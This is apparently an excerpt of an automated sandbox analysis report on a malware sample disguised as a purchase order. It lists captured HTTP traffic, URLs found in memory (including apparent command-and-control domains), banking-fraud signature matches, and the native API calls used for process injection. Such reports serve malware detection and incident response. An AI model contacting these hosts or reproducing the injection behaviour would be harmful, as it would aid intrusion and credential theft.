a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 49 ec 44 60 d4 8a b4 Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uD4l0%2FJdSKjgA%2FvD7RNAAK02qN%2BjGt5SAa2WE9QITWnuJYrefV44qJEUWTvKT187Z3MrtbLRLHjTg34RC2kMYc8mCcqn5x2yJCwcVIorbVq9TsgdCdF9N3wRdR3mBGG%2BBS%2FIRabrV0eh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481e068dcb0b99-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: PO 20495088.exe, 00000000.00000002.2338435823.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.Fedegaritech.online
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/Cerebral_Palsy_Types.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/Feeds.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN5
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/Fodder.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/Green_Foods_Benefits.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/USC_University_Affiliated_Program.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZ
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/__media__/design/underconstructionnotice.php?d=fedegaritech.online
                Source: sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fedegaritech.online/__media__/js/trademark.php?d=fedegaritech.online&type=ns
                Source: sKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ssrnoremt-rise.sbs
                Source: sKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ssrnoremt-rise.sbs/3jsc/
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
                Source: sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_des
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10330
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sdiagnhost.exe, 00000009.00000003.2767472147.000000000746B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000005720000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000004010000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0042C6F3 NtClose
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762B60 NtClose,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017635C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01764340 NtSetContextThread
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01764650 NtSuspendThread
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762AF0 NtWriteFile
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762AD0 NtReadFile
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762C60 NtCreateKey
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762F30 NtCreateSection
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762FE0 NtCreateFile
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762FB0 NtResumeThread
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762FA0 NtQuerySection
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01762E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01763010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01763090 NtSetValueKey
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017639B0 NtGetContextThread
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01763D70 NtOpenThread
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01763D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04414650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04414340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412BA0 NtEnumerateValueKey,LdrInitializeThunk
